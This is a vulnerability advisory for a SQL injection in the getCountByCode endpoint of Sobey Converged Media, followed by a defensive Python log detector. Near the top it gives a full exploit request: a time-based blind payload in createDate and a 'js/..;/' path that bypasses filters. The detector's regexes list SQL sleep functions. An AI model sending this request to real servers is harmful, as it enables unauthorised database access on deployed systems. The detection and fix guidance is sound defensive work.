Vulnerability description
The getCountByCode endpoint of Sobey Converged Media (索贝融媒体) has a SQL injection vulnerability: an attacker can insert malicious SQL into the query the application intended to run and execute database operations that should not be permitted.
GET /sobey-mchEditor/js/..;/count/getCountByCode?createDate=1%27+AND+%28SELECT+6067+FROM+%28SELECT%28SLEEP%283%29%29%29ZuGP%29+AND+%27SlgF%27%3D%27SlgF&orderType=1&status=1&userCode=1&siteCode=1&token=1 HTTP/1.1
Host:
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36
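The request above carries two things a defender should be able to recognise in access logs: a time-based blind payload (SLEEP(3) inside the createDate parameter, which makes the database stall instead of returning an error) and a path written as js/..;/count/..., where the ";" path parameter lets the request reach the count servlet while a filter matching on the raw path sees a request under js/. The following detector is an added example, not code from the advisory or from Sobey: it decodes each request line, models how a servlet container resolves the path, and flags parameter values that contain time-based SQL functions or a quote followed by a boolean operator. The log lines are constructed; the first one is the request quoted above.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qsl

# Functions that time-based blind SQL injection payloads rely on, matched on decoded values.
TIME_BASED = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP)\s*\(|\bWAITFOR\s+DELAY\b", re.IGNORECASE)
# A closing quote followed by AND/OR means the value is breaking out of a string literal.
QUOTE_BREAKOUT = re.compile(r"'\s*(AND|OR)\b", re.IGNORECASE)

REASON_TIME_BASED = "time-based SQL function in value"
REASON_BREAKOUT = "quote followed by AND/OR"
REASON_PATH = "path resolves to a different servlet than the raw path"


def container_path(raw_path):
    """Model how a servlet container resolves a request path (assumption: Tomcat-style
    handling): drop ';...' path parameters from every segment, then collapse '.' and '..'.
    The result is the path the application actually serves, which can differ from the
    raw path that a front-end URL filter matched on."""
    segments = [seg.split(";", 1)[0] for seg in raw_path.split("/")]
    return posixpath.normpath("/".join(segments)) or "/"


def path_needs_normalisation(raw_path):
    """True when a segment carries a ';' path parameter or is a dot segment."""
    return any(";" in seg or seg in (".", "..") for seg in raw_path.split("/"))


def analyse_request_line(line):
    """Return a list of (field, reason) findings for one HTTP request line."""
    _method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    findings = []
    if path_needs_normalisation(parts.path):
        findings.append(("path", REASON_PATH + ": " + container_path(parts.path)))
    # parse_qsl percent-decodes values and turns '+' into spaces, so the regexes
    # run on the same text the application would have seen.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if TIME_BASED.search(value):
            findings.append((name, REASON_TIME_BASED))
        if QUOTE_BREAKOUT.search(value):
            findings.append((name, REASON_BREAKOUT))
    return findings


def scan(lines):
    """Map each request line that produced findings to its findings."""
    results = {}
    for line in lines:
        findings = analyse_request_line(line)
        if findings:
            results[line] = findings
    return results


# Constructed sample log: the first line is the request quoted in the advisory,
# the second is a benign request to the same endpoint.
CONSTRUCTED_LOG = [
    "GET /sobey-mchEditor/js/..;/count/getCountByCode?createDate=1%27+AND+%28SELECT+6067+FROM+"
    "%28SELECT%28SLEEP%283%29%29%29ZuGP%29+AND+%27SlgF%27%3D%27SlgF&orderType=1&status=1"
    "&userCode=1&siteCode=1&token=1 HTTP/1.1",
    "GET /sobey-mchEditor/count/getCountByCode?createDate=2024-01-01&orderType=1&status=1"
    "&userCode=1&siteCode=1&token=1 HTTP/1.1",
]

if __name__ == "__main__":
    for line, findings in scan(CONSTRUCTED_LOG).items():
        print(line.split("?", 1)[0])
        for field, reason in findings:
            print("  ", field, "->", reason)
```

Detection of this shape complements, but does not replace, the durable fix on the application side, which is to bind createDate as a query parameter rather than concatenating it into the SQL string; a filter that only inspects the raw path should also be fed the normalised path that container_path computes, otherwise the js/..;/ prefix hides the real target from it.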